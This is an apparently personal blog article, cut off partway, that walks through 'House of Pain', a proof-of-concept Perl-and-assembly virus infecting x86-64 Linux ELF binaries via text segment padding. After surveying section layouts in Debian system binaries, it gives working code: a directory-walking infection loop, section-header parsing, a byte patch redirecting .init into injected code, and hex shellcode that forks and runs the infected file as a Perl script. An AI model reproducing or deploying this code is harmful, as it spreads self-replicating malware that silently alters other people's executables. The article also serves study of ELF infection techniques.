<html>
<title>~isra</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/style/w3.css">
<link rel="stylesheet" href="/style/main.css">
<body>
  <div class="w3-container">
    <div class="w3-row">
  <div class="w3-col s3 m2">
    <p><img class="header-img" src="/images/escher.png"></p>
  </div>
  <div class="w3-col s8 m9">
    <p>
      <strong>Linux, programming &amp; otras yerbas..</strong><br />
      <a href="/index.html">home</a> - <a href="/now.html">now</a> - <a href="https://hckng.org/" target="_blank">hckng</a>
    </p>
  </div>
  <div class="w3-col s1 m1">
    <div class="w3-right"><p><a href="/about.html">{?}</a></p></div>
  </div>
</div>
    <p>
      <div class="w3-row path">
        <div class="w3-col s6">path: /articles/house-of-pain.html</div>
        <div class="w3-col s6">
          <div class="w3-right"><a href="index.html">&Larr; go back</a></div>
        </div>
      </div>
    </p>
    <div class="content">
      <p>
        
<h4><strong>House of Pain</strong></h4>
A practical approach for an x86-64 ELF virus.<br />
<span class="date">Last revision: july 28th, 2024.</span>
<ol>
 <li><a href="#introduction">Introduction</a></li>
 <li><a href="#preliminaries">Preliminaries</a></li>
 <li><a href="#patterns">Patterns in ELF binaries</a></li>
  <ol>
    <li><a href="#patterns1">Number of ELFs</a></li>
    <li><a href="#patterns2">Executable sections</a></li>
    <li><a href="#patterns3">Section size</a></li>
    <li><a href="#patterns4">Padding bytes</a></li>
    <li><a href="#patterns5">Section code</a></li>
  </ol>  
<li><a href="#infection">Infection</a></li>
  <ol>
    <li><a href="#infection1">Goal</a></li>
    <li><a href="#infection2">Algorithm</a></li>
  </ol>
<li><a href="#implementation">Implementation</a></li>
  <ol>
    <li><a href="#implementation1">Helper subroutines and main loop</a></li>
    <li><a href="#implementation2">Virus content</a></li>
    <li><a href="#implementation3">Read ELF header</a></li>
    <li><a href="#implementation4">Check for infected binaries</a></li>
    <li><a href="#implementation5">Find .init and .fini sections</a></li>
    <li><a href="#implementation6">Find available padding bytes</a></li>
    <li><a href="#implementation7">Append first jmp in .init</a></li>
    <li><a href="#implementation8">Adjust and append Assembly payload</a></li>
    <li><a href="#implementation9">Append second jump and virus</a></li>
    <li><a href="#implementation10">Copy rest of binary and replace original file</a></li>
    <li><a href="#implementation11">Virus payload</a></li>
  </ol>  
 <li><a href="#detection">Detection</a></li>
 <li><a href="#results">Results and final words</a></li>
</ol>

<br />
<a name="introduction"></a><h4>1. Introduction</h4>
<hr />

<p>
This article describes a practical approach for a proof-of-concept x86-64 ELF 
virus <em>"House of Pain"</em> based on the classical Text Segment Padding Infection 
technique and common patterns found in regular x86-64 ELF binaries. The
presented approach involves single-byte patching, jumps between padding areas,
and a combined implementation of Assembly and Perl. In addition, this approach
does not modify any header information or file size.
</p>

<p>
<strong>IMPORTANT NOTE</strong>: The work presented in this article was made for educational
purposes only, I'm not responsible for any misuse or damage caused by it. Use it
at your own risk.
</p>

<br />
<a name="preliminaries"></a><h4>2. Preliminaries</h4>
<hr />

<p>
The Text Segment Padding Infection technique was described almost 26 years ago
by Silvio Cesare in the papers "<a href="http://ouah.org/elf-pv.txt" target="_blank">UNIX ELF PARASITES AND VIRUS</a>" and "<a href="https://www.win.tue.nl/~aeb/linux/hh/virus/unix-viruses.txt" target="_blank">UNIX 
VIRUSES</a>". Roughly speaking this infection method considers the fact that the
text and data segments are stored flush against each other on disk and such
segments need to be aligned based on the system's page size, which leaves an
amount of padding bytes between the text and data segments that can be used to
inject parasite code. Diagram 1 illustrates such process:
</p>

<pre>
key:
 [...]	A complete page
 V	Parasite code
 T	Text
 D	Data
 P	Padding

------------- Diagram 1: Text Segment Padding Infection -------------------
Page Nr
#1	[TTTTTTTTTTTTVVPP]		&lt;- Text segment
#2	[PPPPDDDDDDDDPPPP]		&lt;- Data segment
---------------------------------------------------------------------------
</pre>

<p>
A simple yet elegant concept. For a more recent discussion on ELF infection 
techniques the reader is encouraged to read ElfMaster's "<a href="https://bitlackeys.org/papers/pocorgtfo20.pdf" target="_blank">Modern ELF Infection 
Techniques of SCOP Binaries</a>" and ic3qu33n's "<a href="https://tmpout.sh/3/12.html" target="_blank">u used 2 call me on my 
polymorphic shell phone</a>".
</p>

<br />
<a name="patterns"></a><h4>3. Patterns in ELF binaries</h4>
<hr />

<p>
As mentioned before, the Text Segment Padding Infection technique makes use of
available padding bytes at the end of the text segment to inject parasite code.
Basic tests show that these padding bytes are present by default on most text
sections. The question is: how common is this behaviour on regular ELF binaries
i.e. binaries installed on a common Linux distribution? do these binaries share
a common structure that can be used in an infection scenario?
</p>

<p>
To answer these questions several tests were performed to analyze properties of
binaries located under <em>/usr/bin</em> and <em>/usr/sbin</em> on a Debian 12 distribution. The
results of these tests will form the basis for <em>"House of Pain"</em>. 
</p>

<a name="patterns1"></a><h5>3.1 Number of ELFs</h5>

<p>
First a simple check for ELF magic numbers is done to obtain the number of valid
ELFs to be analyzed under <em>/usr/bin</em> and <em>/usr/sbin</em>.
</p>

<pre>&dollar; readelf -h /usr/bin/* 2>/dev/null | grep "7f 45 4c 46" | sort | uniq -c
 
   1122   Magic:  7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
     48   Magic:  7f 45 4c 46 02 01 01 03 00 00 00 00 00 00 00 00 

&dollar; readelf -h /usr/sbin/* 2>/dev/null | grep "7f 45 4c 46" | sort | uniq -c

   340   Magic:  7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
     2   Magic:  7f 45 4c 46 02 01 01 03 00 00 00 00 00 00 00 00 
</pre>

<p>
Results show 1170 valid ELF binaries under <em>/usr/bin</em> and 342 under <em>/usr/sbin</em>, 
with a total of 1512 files.
</p>

<a name="patterns2"></a><h5>3.2 Executable sections</h5>

<p>
Executable sections can be directly identified by looking for entries with 
SHF_ALLOC|SHF_EXECINSTR flags (AX in readelf utility). The first tests are then 
aimed to check for common executable sections present in regular binaries and 
the order in which they may appear (section index). This is done as follows:
</p>

<pre>
&dollar; readelf -W -S /usr/bin/* 2>/dev/null | grep "AX" | \
   awk '{print &dollar;1" "&dollar;2" "&dollar;11}' | sort | uniq -c | sort -r

   1040 [13] .plt 16
   1040 [12] .init 4
   1026 [16] .fini 4
   1025 [14] .plt.got 8
   1020 [15] .text 16
     90 [15] .fini 4
     90 [14] .text 16
     76 [12] .plt 16
     76 [11] .init 4
     75 [13] .plt.got 8
     40 [17] .fini 4
     40 [14] .plt 16
     40 [13] .init 4
     39 [16] .text 16
     39 [15] .plt.got 8
     10 [18] .fini 4
     10 [17] .text 16
     10 [16] .plt.got 8
     10 [15] .plt 16
     10 [14] .init 4
      5 [15] .text 64
      2 [15] .text 32
      1 [18] .plt 16
      1 [16] .init 4
      1 [14] .fini 4
      1 [13] .text 256
      1 [12] .text 32
      1 [11] .plt 16


&dollar; readelf -W -S /usr/sbin/* 2>/dev/null | grep "AX" | \
   awk '{print &dollar;1" "&dollar;2" "&dollar;11}' | sort | uniq -c | sort -r

    321 [16] .fini 4
    319 [15] .text 16
    319 [14] .plt.got 8
    319 [13] .plt 16
    319 [12] .init 4
     13 [13] .plt.got 8
     13 [12] .plt 16
     13 [11] .init 4
     12 [15] .fini 4
     12 [14] .text 16
      8 [14] .plt 16
      8 [13] .init 4
      7 [17] .fini 4
      7 [16] .text 16
      7 [15] .plt.got 8
      2 [18] .fini 4
      2 [17] .text 16
      2 [16] .plt.got 8
      2 [15] .plt 16
      2 [14] .init 4
      1 [15] .text 32
      1 [14] .text 64
</pre>


<p>
The output above displays the number of ocurrences, section index, section name
and address alignment. Results show that most binaries have executable sections
at the following indexes:
</p>

<pre>
	    _________________________________________________
	   |  section  |  index  |  range  |  addr alignment |
	    -------------------------------------------------
	   | .init     |   12    | [11-16] |           4     |
	   | .plt      |   13    | [11-18] |          16     |
	   | .plt.got  |   14    | [13-16] |           8     |
	   | .text     |   15    | [13-17] |      16-256     |
	   | .fini     |   16    | [15-18] |           4     |
	    -------------------------------------------------
                      Table 1: Executable sections
</pre>

<p>
The reader may also notice that most executable sections have a fixed address
alignment, which will be used later on.
</p>


<a name="patterns3"></a><h5>3.3 Section size</h5>

<p>
The next step is to check the size of executable sections, as follows:
</p>

<pre>
&dollar; readelf -W -S /usr/bin/* 2>/dev/null | grep "AX" | awk '{print &dollar;2" "&dollar;6}' | \
   sort | uniq -c | sort -r

   1165 .fini 000009
   1163 .init 000017
    867 .plt.got 000008
    114 .plt.got 000010
     85 .plt.got 000018
     31 .plt 000310
     27 .plt.got 000020
     26 .plt 000160
     19 .plt.got 000030
     19 .plt 000390
     18 .plt 000330
     17 .plt.got 000028
     17 .plt 000880
     16 .plt 000290
     16 .plt 000200
     15 .plt 000670
     [...]
     3 .text 01509e
     3 .text 00c8e2
     3 .text 00b38e
     3 .text 009dfe
     3 .text 00992e
     3 .text 003425
     3 .text 0030d1
     3 .text 002bae
     3 .text 001ac2
     3 .text 001401
     [...]
     1 .plt 0004e0
     1 .plt 000060
     1 .plt 000050
     1 .init 000024
     1 .init 000021
     1 .init 00001b
     1 .init 00001a
     1 .fini 00000e
     1 .fini 00000d

&dollar; readelf -W -S /usr/sbin/* 2>/dev/null | grep "AX" | awk '{print &dollar;2" "&dollar;6}' | \
   sort | uniq -c | sort -r

    342 .init 000017
    342 .fini 000009
    306 .plt.got 000008
     44 .text 1d12ad
     44 .plt 000ee0
     32 .plt 001050
     31 .text 01e763
     17 .plt.got 000010
      9 .plt.got 000028
      7 .text 00ad97
      7 .plt 000880
      7 .plt 0003d0
      6 .text 0d9c3c
      6 .text 01978c
      6 .plt 001560
      6 .plt 000850
      [...]
      1 .text 000ce6
      1 .text 000ca7
      1 .text 000c5d
      1 .text 000ace
      1 .text 000aae
      1 .text 000a66
      1 .text 000a17
      [...]
      1 .plt 0001a0
      1 .plt 000190
      1 .plt 000140
      1 .plt 000110
      1 .plt 0000c0
      1 .plt 000090
      1 .plt 000080
      1 .plt 000060
</pre>

<p>
The output above displays the number of ocurrences, section name and section
size. Results show that most .init and .fini sections have the same size across
different binaries (17 and 9), many .plt.got sections have size 8, and the .plt
and .text sections have variable sizes. 
</p>


<a name="patterns4"></a><h5>3.4 Padding bytes</h5>

<p>
A <a href="https://github.com/ilv/vx/blob/main/hop/padding-bytes.pl" target="_blank">custom script</a> was used to analyze available padding bytes on executable
sections using the formula:
</p>

<p>
<em>padding bytes = next section offset - (section offset + section size)</em>
</p>

<p>
The results are as follows:
</p>

<pre>
&dollar; perl padding-bytes.pl

 [+] Padding bytes analyzer
 [*]
 [+] Analyzing /usr/bin
 [+] Analyzing /usr/sbin
 [*]
 [+] Total files analyzed: 1512
 [+] Total files with .init section: 1509
 [+] Total files with .plt section: 1511
 [+] Total files with .plt.got section: 1490
 [+] Total files with .text section: 1512
 [+] Total files with .fini section: 1509
 [*]
 [+] Average padding size for .init: 8.98011928429423
 [+] Average padding size for .plt: 2.75314361350099
 [+] Average padding size for .plt.got: 7.13020134228188
 [+] Average padding size for .text: 3.73148148148148
 [+] Average padding size for .fini: 2086.91981444665
 [*]
 [+] Padding bytes sizes per section
 [+] Section .init:
     Padding size 5: 1 file(s)
     Padding size 1: 4 file(s)
     Padding size 15: 1 file(s)
     Padding size 14: 1 file(s)
     Padding size 4: 1 file(s)
     Padding size 9: 1501 file(s)
 [+] Section .plt:
     Padding size 16: 3 file(s)
     Padding size 3952: 1 file(s)
     Padding size 0: 1506 file(s)
     Padding size 160: 1 file(s)
 [+] Section .plt.got:
     Padding size 0: 186 file(s)
     Padding size 56: 1 file(s)
     Padding size 8: 1298 file(s)
     Padding size 40: 4 file(s)
     Padding size 24: 1 file(s)
 [+] Section .text:
     Padding size 3: 426 file(s)
     Padding size 2243: 1 file(s)
     Padding size 687: 1 file(s)
     Padding size 0: 229 file(s)
     Padding size 1: 296 file(s)
     Padding size 2: 558 file(s)
     Padding size 22: 1 file(s)
 [+] Section .fini:
     Padding size 1167: 2 file(s)
     Padding size 1611: 1 file(s)
     Padding size 3815: 2 file(s)
     Padding size 1223: 1 file(s)
     Padding size 51: 2 file(s)
     Padding size 1779: 1 file(s)
     Padding size 1211: 1 file(s)
     Padding size 1495: 3 file(s)
     Padding size 3731: 2 file(s)
     Padding size 523: 3 file(s)
     Padding size 2619: 1 file(s)
     Padding size 1303: 1 file(s)
     Padding size 835: 2 file(s)
     Padding size 563: 3 file(s)
     [...]
     Padding size 647: 1 file(s)
     Padding size 3699: 15 file(s)
     Padding size 3863: 6 file(s)
     Padding size 1043: 5 file(s)
     Padding size 1943: 1 file(s)
     Padding size 3335: 1 file(s)
     Padding size 259: 6 file(s)
     Padding size 787: 2 file(s)
     Padding size 3843: 3 file(s)
</pre>

<p>
The output above displays the total number of binaries containing each
executable section, average padding bytes per section and the number of binaries
with a given padding size per section. Results show that most binaries have 
executable sections with a fixed size of padding bytes, with the exception of 
.fini section which in addition presents the greater size of padding bytes on
average:
</p>

<pre>
	    ____________________________________________
	   |  section  |  frequent padding  |  average  |
	    --------------------------------------------
	   | .init     |         9          |    8.5    |
	   | .plt      |         0          |    0.8    |
	   | .plt.got  |         8          |     7     |
	   | .text     |         3          |     5     |
	   | .fini     |         -          |   1845    |
	    --------------------------------------------
                       Table 2: Padding bytes
</pre>

<p>
These results also show that padding bytes are present in most executable 
sections.
</p>


<a name="patterns5"></a><h5>3.5 Section code</h5>

<p>
Finally, the content of executable sections with roughly the same size across
binaries was analyzed to check for patterns. As expected, the dissasemble of 
.init and .fini sections in common binaries show that the executable code used
in .init sections is similar, and the executable code used in .fini sections is
exactly the same:
</p>

<pre>
&dollar; objdump -d -j .init -j .fini /usr/bin/perl
 [...]
 0000000000047000 &lt;.init>:
   47000:	48 83 ec 08          	sub    &dollar;0x8,%rsp
   47004:	48 8b 05 d5 9f 33 00 	mov    0x339fd5(%rip),%rax
   4700b:	48 85 c0             	test   %rax,%rax
   4700e:	74 02                	je     47012 <endgrent-0x1e>
   47010:	ff d0                	callq  *%rax
   47012:	48 83 c4 08          	add    &dollar;0x8,%rsp
   47016:	c3                   	retq   
 [...]
 00000000001cb05c &lt;.fini>:
  1cb05c:	48 83 ec 08          	sub    &dollar;0x8,%rsp
  1cb060:	48 83 c4 08          	add    &dollar;0x8,%rsp
  1cb064:	c3                   	retq   


&dollar; objdump -d /usr/bin/sudo
 [...]
 0000000000005000 &lt;.init>:
    5000:	48 83 ec 08          	sub    &dollar;0x8,%rsp
    5004:	48 8b 05 dd 6f 02 00 	mov    0x26fdd(%rip),%rax
    500b:	48 85 c0             	test   %rax,%rax
    500e:	74 02                	je     5012 <mkstemps-0x1e>
    5010:	ff d0                	callq  *%rax
    5012:	48 83 c4 08          	add    &dollar;0x8,%rsp
    5016:	c3                   	retq   
 [...]
 0000000000021a24 &lt;.fini>:
   21a24:	48 83 ec 08          	sub    &dollar;0x8,%rsp
   21a28:	48 83 c4 08          	add    &dollar;0x8,%rsp
   21a2c:	c3                   	retq   


&dollar; objdump -d /usr/sbin/reboot
 [...]
 0000000000011000 &lt;.init>:
   11000:	48 83 ec 08          	sub    &dollar;0x8,%rsp
   11004:	48 8b 05 95 2f 0f 00 	mov    0xf2f95(%rip),%rax
   1100b:	48 85 c0             	test   %rax,%rax
   1100e:	74 02                	je     11012 <chmod-0x1e>
   11010:	ff d0                	callq  *%rax
   11012:	48 83 c4 08          	add    &dollar;0x8,%rsp
   11016:	c3                   	retq   
 [...]
 00000000000bf8cc &lt;.fini>:
   bf8cc:	48 83 ec 08          	sub    &dollar;0x8,%rsp
   bf8d0:	48 83 c4 08          	add    &dollar;0x8,%rsp
   bf8d4:	c3                   	retq   
</pre>


<br />
<a name="infection"></a><h4>4. Infection</h4>
<hr />

<a name="infection1"></a><h5>4.1 Goal</h5>

<p>
The main goal for <em>"House of Pain"</em> is to perform infection with the minimum
modification of the original binary as possible. This is achieved by considering
the following (based mostly on the results from the Section 3):
</p>

<ul>
  <li>Most binaries have the executable sections .init and .fini</li>
  <li>Most .init and .fini entries can be found within a bounded range in the
    section headers table.</li>
  <li>Padding bytes are present in most x86-64 ELF binaries.</li>
  <li>Most .init sections have a fixed amount of padding bytes.</li>
  <li>Most .fini sections have a large amount of padding bytes on average.</li>
  <li>Most .init sections share similar executable code ending in 0xc3.</li>
  <li>The .init section code is executed before the binary's main program.</li>
</ul>


<a name="infection2"></a><h5>4.2 Algorithm</h5>

<p>
The infection algorithm is a combination/variation of "<a href="https://www.win.tue.nl/~aeb/linux/hh/virus/unix-viruses.txt" target="_blank">Text Segment Padding
Infection</a>" and "<a href="https://tmpout.sh/3/30.html" target="_blank">Linux.Linkin.pl: Another Perl x64 ELF virus</a>". The idea
is simple: 
</p>
 
<ul>
 <li>Patch the last byte of the .init section code (0xc3 return instruction) with
   a NOP instruction to extend the execution flow.</li>

 <li>Inject an auxiliary parasite code (5-byte JMP + 1-byte 0xc3) in the available
   padding bytes after the .init section to redirect the execution flow to the
   available padding bytes after the .fini section.</li>

 <li>Inject the main parasite code in the available padding bytes after the .fini
   section, with a final 5-byte JMP to return to the 0xc3 instruction of the
   extended .init section, which then returns the execution flow to the binary's
   main program.</li>
</ul>

<p>
Since the .init section is executed before the binary's main program and most
binaries have padding bytes available, the algorithm described doest not require
the modification of the binary's entry point or headers information.
</p>

<p>
Diagrams 2 and 3 illustrate scenarios of non-infected and infected binaries:
</p>

<pre>
I    init content
C    return instruction c3
P    padding bytes
F    fini content
D    rodata content
N    NOP instruction
J    JMP instruction
V    parasite code
+    sections between .init and .fini

-------------------- Diagram 2: non-infected -------------------------------
  
  [ IIIIIIIIII ] &lt;- .init section (17 bytes)
  [ IIIIIICPPP ] &lt;- return instruction + start of padding (9 bytes)
  [ PPPPPP++++ ] &lt;- start of next sections
  [ ++++++++++ ]
  [ ++++++++++ ]
  [ FFFFFFFFFP ] &lt;- .fini section (9 bytes) + start of padding
  [ PPPPPPPPPP ]
  [ .......... ]
  [ PPPPPPPPPP ]
  [ DDDDDDDDDD ] &lt;- .rodata section


---------------------- Diagram 3: infected ---------------------------------

  [ IIIIIIIIII ] &lt;- .init section (17 bytes)
  [ IIIIIINJJJ ] &lt;- NOP instruction + jump to parasite code (5 bytes)
  [ JJCPPP++++ ] &lt;- start of next sections
  [ ++++++++++ ]
  [ ++++++++++ ]
  [ FFFFFFFFFV ] &lt;- .fini section (9 bytes) + start of parasite code
  [ VVVVVVVVVV ]
  [ .......... ]
  [ VJJJJJPPPP ] &lt;- jump to .init extended return instruction (5 bytes)
  [ DDDDDDDDDD ] &lt;- .rodata section
</pre>

<br />
<a name="implementation"></a><h4>5. Implementation</h4>
<hr />

<p>
The main part of <em>"House of Pain"</em> is implemented as Perl code that gets
embedded in the available padding bytes after the .fini section and then when
the infected binary is executed a crafted Assembly payload is used to <a href="https://hckng.org/articles/perljam-elf64-virus.html" target="_blank">run the 
infected binary as a Perl script</a>. The script loops through its current directory
infecting other suitable binaries and then prints an extract from the song <em>"Jump 
around"</em> from <em>"House of Pain"</em>. Relevant parts of the implementation will be 
discussed in the next subsections.
</p>

<p>
<strong>NOTE</strong>: The described Perl implementation has been minimized to reduce its size
and therefore it may not be easy to read at first.
</p>


<a name="implementation1"></a><h5>5.1 Helper subroutines and main loop</h5>

<p>
First, three helper subroutines are used for reading and writing content in a
succinct way:
</p>

<pre class="code">
sub rd { read &dollar;_[0], my &dollar;x, &dollar;_[1];&dollar;x }
sub sk { seek &dollar;_[0], &dollar;_[1], 0 }
sub wr { syswrite &dollar;_[0], &dollar;_[1] }
</pre>

<p>
Then, the main loop iterates through the current directory checking for valid 
files and skipping the current script/infected binary:
</p>

<pre class="code">
foreach my &dollar;f(glob qq{"./*"}){
   next if(!-f &dollar;f);
   # skip self
   next if(&dollar;f eq &dollar;0);
   [...]
   [...]
}
</pre>

<a name="implementation2"></a><h5>5.2 Virus content</h5>

<p>
The next step is to obtain the virus content by using the predefined variable 
&dollar;0. Note that if <em>"House of Pain"</em> is executed from an infected binary then a 
search for the strings <em>"#!/usr/bin/perl"</em> and <em>"__END__"</em> must be performed to
ensure that only the source code of the virus is copied and not the content of
the binary. Also note that the virus content must start with a newline character
to avoid concatenation of unwanted prefixes in the string <em>"#!/usr/bin/perl"</em>.
</p>

<pre class="code">
my &dollar;vx = "\n";
my &dollar;vx_end = "__"."END__";

# get vx content
my &dollar;vx_start = 0;
open my &dollar;vh, '&lt;', &dollar;0;
while(&lt;&dollar;vh>) {
   &dollar;vx_start++ if(&dollar;_ =~ "#!/usr/bin/perl");
   &dollar;vx .= &dollar;_ if(&dollar;vx_start);
   last if(&dollar;_ =~ /&dollar;vx_end/);
}
my &dollar;vx_sz = length(&dollar;vx);
</pre>


<a name="implementation3"></a><h5>5.3 Read ELF header</h5>

<p>
The target binary is openned with the ':raw' pseudo-layer for passing binary
data and its ELF header is read using the unpack function (check <a href="https://hckng.org/articles/perljam-elf64-virus.html" target="_blank">here</a> for a more 
detailed explanation). Then a simple check for the magic numbers is made to skip 
non-ELFs.
</p>

<pre class="code">
# read elf header
open my &dollar;fh, '&lt;:raw', &dollar;f;
my  = unpack("C a a a C12 S2 I q3 I S6", rd(&dollar;fh, 64));
# skip non-elfs
next if(&dollar;e[0] != 127 && &dollar;e[1] !~ 'E' && &dollar;e[2] !~ "L" && &dollar;e[3] !~ "F");
</pre>


<a name="implementation4"></a><h5>5.4 Check for infected binaries</h5>

<p>
To skip infected files a simple check is done by looking for the string
<em>"#!/usr/bin/perl"</em> embedded in the binary. This is far from ideal and it should
be enhanced in future versions or variations.
</p>

<pre class="code">
# lazy check for infected files
my &dollar;infect = 0;
open my &dollar;fh2, '&lt;:raw', &dollar;f;
while(&lt;&dollar;fh2>) {
   if(&dollar;_ =~ "#!/usr/bin/perl") {
       &dollar;infect++;
       last;
   }
}
next if(&dollar;infect);
</pre>


<a name="implementation5"></a><h5>5.5 Find .init and .fini sections</h5>

<p>
The .init and .fini sections are found based on the patterns discussed in 
subsection 3.2. First a SEEK operation is performed to the start of the section
headers table using the value &dollar;e[21] = e_shoff. Then the first 18 entries (of 
size &dollar;e[26] = e_shentsize) in the section header table are read and unpacked. 
The .init section is found by looking for the first section with &dollar;u[2] = 
sh_flags = 6 (AX) and the .fini section is found by looking for the next section 
after .init with &dollar;u[2] = sh_flags = 6 (AX) and &dollar;u[8] = sh_addralign = 4.
</p>

<pre class="code">
sk(&dollar;fh, &dollar;e[21]);
my (&dollar;y1, &dollar;z1, &dollar;y2, &dollar;z2);
for(my &dollar;i = 0; &dollar;i &lt; 18; &dollar;i++) {
   my  = unpack("I2 q4 I2 q2", rd(&dollar;fh, &dollar;e[26]));
   # first section with sh_flags =6 (AX) should be .init
   if(&dollar;u[2] == 6) { 
       (&dollar;y1, &dollar;z1) = (&dollar;u[4], &dollar;u[5]) if(!&dollar;y1);
       (&dollar;y2, &dollar;z2) = (&dollar;u[4], &dollar;u[5]) if(!&dollar;y2 && &dollar;i>12 && &dollar;u[8] == 4);
   }
   last if(&dollar;y2);
}
next if(!&dollar;y1 or !&dollar;y2); # .init or .fini not found, skip
</pre>

<p>
After this, the variables &dollar;y1, &dollar;z1 contain the values sh_offset and sh_size of 
the .init section and &dollar;y2, &dollar;z2 contain the values sh_offset and sh_size of the 
.fini section. If these values are not defined then the sections were not found 
and the binary is skipped.
</p>


<a name="implementation6"></a><h5>5.6 Check for available padding bytes</h5>

<p>
After finding .fini the next section is read and unpacked to check for available
padding bytes. For this the condition "&dollar;u[4] - (&dollar;y2 + &dollar;z2) < &dollar;p_sz + &dollar;vx_sz" is
checked, where:
</p>

<pre>
&dollar;u[4]     = next section (usually .rodata) sh_offset
&dollar;y2 + &dollar;z2 = .fini sh_offset + .fini sh_size 
&dollar;p_sz     = size of the Assembly payload
&dollar;vx_sz    = size of "House of Pain" (from subsection 5.1)
</pre>

<pre class="code">
# read next section header entry (.rodata)
my  = unpack("I2 q4 I2 q2", rd(&dollar;fh, &dollar;e[26]));

# check if vx size + payload fits between .rodata and .fini
# free space: .rodata sh_offset - (.fini sh_offset + .fini sh_size)
next if(&dollar;u[4] - (&dollar;y2 + &dollar;z2) &lt; &dollar;p_sz + &dollar;vx_sz);
</pre>

<p>
If the amount of available padding bytes is not enough the binary is skipped.
</p>


<a name="implementation7"></a><h5>5.7 Append first jmp in .init</h5>

<p>
The next step is to append the first jmp in the available padding bytes after
.init (assuming that there will be enough space for it - see subsection 3.3). A
temporary copy of the binary is created and the binary's content is copied until
the last byte of the .init section - 1, which is:
</p>

<p><em>&dollar;y1 + &dollar;z1 -1 = .init sh_offset + .init sh_size - 1.</em></p>

<p>
Then the distance to the available bytes after the .fini section is calculated 
with:
</p>

<p>
  <em>&dollar;dist = &dollar;y2 + &dollar;z2 - &dollar;y1 -&dollar;z1 - 7</em>
</p>

<p>where:</p>

<pre>
&dollar;y2 = .fini sh_offset
&dollar;z2 = .fini sh_size
&dollar;y1 = .init sh_offset
&dollar;z2 = .init sh_size
7   = 1-byte NOP + 5-byte JMP instruction + 1-byte return instruction (0xc3)
</pre>

<p>
The jump payload is then built starting with the 0x90 NOP instruction, then the 
0xe9 instruction to the calculated distance (packed as 32-bit little-endian 
value) and finally a 0xc3 return instruction.
</p>

<p>
After that the rest of the binary is copied until the start of the available
padding bytes after .fini (&dollar;dist + 1).
</p>

<pre class="code">
# tmp copy for patched elf
open my &dollar;tmp_fh, '>:raw' , "&dollar;f.t";
 
# read everything until the end of .init code except for the last byte
# which should contain the return instruction 0xc3
sk(&dollar;fh,0);
wr(&dollar;tmp_fh, rd(&dollar;fh, &dollar;y1 + &dollar;z1 - 1));

# write jmp to padding bytes after .fini
my &dollar;dist = &dollar;y2 + &dollar;z2 - &dollar;y1 -&dollar;z1 - 7;
my &dollar;jmp1 = "\x90\xe9".pack("V",&dollar;dist)."\xc3";
rd(&dollar;fh,7);
wr(&dollar;tmp_fh, &dollar;jmp1);

# read and copy rest of binary until padding bytes after .fini
wr(&dollar;tmp_fh, rd(&dollar;fh, &dollar;dist + 1));
</pre>


<a name="implementation8"></a><h5>5.8 Adjust and append Assembly payload</h5>

<p>
As mentioned before, <em>"House of Pain"</em> performs most of its main logic by running
the infected binary as a Perl script. This is done by using a crafted Assembly
payload to execute <em>"/usr/bin/perl -x infected binary"</em> (described in detail <a href="https://hckng.org/articles/perljam-elf64-virus.html" target="_blank">here</a>). However, the "infected_binary" (filename) argument must be adjusted on 
each infection according to the binary's filename. To achieve this an initial 
Assembly code is compiled using a fixed string of length 50 as the filename 
argument (this string will be replaced later on), as follows:
</p>

<pre class="code">
BITS 64
global main
section .text
main:
    call run
    db "/usr/bin/perl", 0x0
    db "-x", 0x0
    db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", 0x0
    
run:
    ;;;;;;;;
    ; fork
    ;;;;;;;;
    pop rsi
    xor rax, rax
    mov rax, 57
    syscall
    test eax, eax
    jne parent

    ;;;;;;;;;;;;;;;;;;;;;;;;;
    ; call perl interpreter
    ;;;;;;;;;;;;;;;;;;;;;;;;;

    ; filename "/usr/bin/perl"
    lea rdi, [rsi]   
    
    ; argv
    ; ["/usr/bin/perl", "-x", "xxxxx..."] (on reverse)
    xor rdx, rdx
    push rdx
    lea rbx, [rsi+17] ; "xxx..."
    push rbx
    lea rbx, [rsi+14] ; "-x"
    push rbx
    push rdi          ; "/usr/bin/perl"
    mov rsi, rsp 

    ; execve & exit
    xor rax, rax
    mov rax, 59
    mov rdx, 0
    syscall
    xor rdx, rdx
    mov rax, 60
    syscall

parent:
    ; cleanup
    xor rax, rax
    xor rdx, rdx
</pre>

<pre>
&dollar; nasm -f elf64 -o hop.o hop.s
&dollar; objdump -d hop.o 
</pre>

<p>
After this, the harcoded payload is generated by removing the hexadecimal 
representation of the fixed string (\x78 * 50) and then splitting the remaining 
shellcode in two: before (&dollar;p1) and after (&dollar;p2) the fixed string.
</p>

<pre class="code">
my (&dollar;p1, &dollar;p2);
&dollar;p1 .= "\xe8\x44\x00\x00\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72";
&dollar;p1 .= "\x6c\x00\x2d\x78\x00";

&dollar;p2 .= "\x00\x5e\x48\x31\xc0\xb8\x39\x00\x00\x00\x0f\x05\x85\xc0\x75\x2e\x48";
&dollar;p2 .= "\x8d\x3e\x48\x31\xd2\x52\x48\x8d\x5e\x11\x53\x48\x8d\x5e\x0e\x53\x57";
&dollar;p2 .= "\x48\x89\xe6\x48\x31\xc0\xb8\x3b\x00\x00\x00\xba\x00\x00\x00\x00\x0f";
&dollar;p2 .= "\x05\x48\x21\xd2\xb8\x3c\x00\x00\x00\x0f\x05\x48\x31\xc0\x48\x31\xd2";
</pre>

<p>
The payload is adjusted on each infection by inserting the hexadecimal 
representation of the infected binary's filename plus N null bytes, where:
</p>

<p>
<em>N = 50 - length(infected binary's filename)</em>
</p>

<p>
Filling with N null bytes after the infected binary's filename ensures that the 
payload will not crash on runtime, since adding or removing bytes will break the 
shellcode. In addition, the first null byte located after the infected binary's 
filename will be interpreted by the machine as the end of the string and the 
remaining null values will be ignored. This leads to the following code:
</p>

<pre class="code">
# write 1st payload
rd(&dollar;fh, &dollar;p_sz);
wr(&dollar;tmp_fh, &dollar;p1);

# adjust payload on-the-fly to include the infected elf filename
# filename . (50-filename) null bytes
my  = split//, &dollar;f;
for(my &dollar;i = 2; &dollar;i &lt; length(&dollar;f); &dollar;i++){ 
   wr(&dollar;tmp_fh, pack("C",(hex unpack("H2", &dollar;chars[&dollar;i]))));
}
for(my &dollar;i = length(&dollar;f) - 2; &dollar;i &lt; 50; &dollar;i++){ 
   wr( &dollar;tmp_fh, pack("C",0x0));
}

# write remaining payload
wr(&dollar;tmp_fh, &dollar;p2);
</pre>


<a name="implementation9"></a><h5>5.9 Append second jump and virus</h5>

<p>
